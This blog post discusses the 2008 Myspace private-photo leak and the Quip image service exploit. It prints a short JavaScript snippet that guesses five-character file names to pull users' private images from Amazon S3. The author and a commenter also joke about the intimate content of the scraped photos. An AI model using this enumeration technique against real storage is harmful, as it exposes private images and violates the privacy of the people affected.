Data Insecurity

It always amazes me to see how people put trust in their service providers. While in principle, there’s no real need to worry, careless implementation of services can really have dire consequences!

And it’s not like leaks and exploits are rare. Sometimes we hear about them, sometimes we don’t. Let’s consider these two (amongst those) I know about:

The 2008 Myspace Leak. In January 2008, a flaw in Myspace’s programming allowed bad guys (let us call them that, although it’s entirely debatable, in the end) to download hundreds of thousands of private pictures from Myspace. (Original story here, and from /.). So about 44,000 users got their private pictures scraped off and seeded to some torrent.

I don’t know, however, if only the pictures were downloaded. Maybe information contained on the private pages was accessed and copied as well. I hope nobody had critical information there.

The Quip Exploit. Quip (dead for now?) used to offer an “image texting service” as an app for the iPhone but was slain by Apple (apparently; I speculate, but its removal from the App Store isn’t a coincidence, I’m sure) when it was made public that they used Amazon’s S3 as a temporary buffer in a rather careless way. While you could not list the contents of the directory, you could brute-force the—too short—file names and still get images out with a high success rate—several per minute.

The Quip service used 5 alphanumeric symbols as a rather weak hash function in a rather careless frobnication of file names. A short piece of JavaScript trying random keys extracted lots of images in a short time:

  var id;  // the five-symbol name currently being probed (an implicit global in the original)

  // Called when the probe image actually loads, i.e. the guessed name exists:
  // keep a link to the picture, then immediately try another name.
  function found() {
    $("#save").prepend("<a target='_new' href='http://pic.quiptxt.com/" + id +
                       "'><img src='http://quipimg.s3.amazonaws.com/" + id +
                       ".jpg' title='" + id + "' /></a> ");
    randquip();
  }

  // Pick a random name of five symbols from [a-z0-9] (36^5 possibilities)
  // and point the probe image at the corresponding S3 object.
  function randquip() {
    var letters = new Array("a", "b", "c", "d",
        "e", "f", "g", "h", "i", "j", "k", "l",
        "m", "n", "o", "p", "q", "r", "s", "t",
        "u", "v", "w", "x", "y", "z", "1", "2",
        "3", "4", "5", "6", "7", "8", "9", "0" );
    var r1 = Math.floor(Math.random() * letters.length);
    var r2 = Math.floor(Math.random() * letters.length);
    var r3 = Math.floor(Math.random() * letters.length);
    var r4 = Math.floor(Math.random() * letters.length);
    var r5 = Math.floor(Math.random() * letters.length);

    id = letters[r1] + letters[r2] + letters[r3] + letters[r4] + letters[r5];
    $("#quip").attr("src", "http://quipimg.s3.amazonaws.com/" + id + ".jpg");
    $("#info").html("<b>" + id + "</b>");
  }

(a code snippet from fang.) So we’re not talking about breaking encryption here. Just random poking in the dark!

* * *

While I think the coders from Myspace were careful and still got hacked, the guys from Quip were quite careless about how their customers’ images were stored. Well, maybe not all that careless. Examining the images from the Quip exploit, we see that they were stripped of all meta-data after being resized to a standard resolution. No comments, no EXIF, nothing from the original iPhone that could help baddies trace the pictures back to their original owners. The problem is that their users were also rather careless about the pictures they exchanged. A quick examination of the pictures shows a BDOW index [1] of 0.075, which is rather high and, well, embarrassing for their users.

Had they simply used a wider key, say, the MD5 of the picture, the Fang exploit wouldn’t have been possible and Quip would still be in business (at least at the time of writing, they seem quite dead; maybe they’ll make a comeback with lessons learnt).

* * *

So there are two lessons here. One, don’t send pictures of your genitalia, or, if you do, use some protection—such as strong encryption with keys pre-shared with the intended receiver. Just don’t trust your provider to be extra careful with your private parts, er, data; they may goof up, even if no evil was intended.

The second lesson here is that if you’re a provider, you must take all possible care to prevent bad guys from breaking in and exploiting your users’ private information. At least the Quip guys tried: they stripped all meta-data from the files themselves, so there’s little chance, if you don’t know the people in the picture, that you can trace them back. But they also erred in thinking that their storage strategy was “safe” through obscurity. Expect the Huns… and, while you’re at it, the Spanish Inquisition.

* * *

I also want to make clear that I have nothing to do with either exploit; I learnt about the Quip exploit by chance, while on IRC. But you know how it is… you spray eye bleach in your face but …somehow …can’t …look …away.

[1] The Boob-Dick-Orifice-or-Worse Index: the number of pictures of boobs, dicks, orifices (or worse) divided by the total number of pictures.

3 Responses to Data Insecurity

  2. Nicolas A. Bérard-Nault says:

    Even though that Quip exploit didn’t last for long, it was a lot of fun, just sitting in front of your screen peeking into the secret lives of random people.

    I must say I was quite fascinated by such a high BDOW index.

  3. [...] a relatively small part of the key changes between calls. As I’ve said before, using slow- or little-varying keys is just begging to get hacked. Not sure how realistic it is to [...]
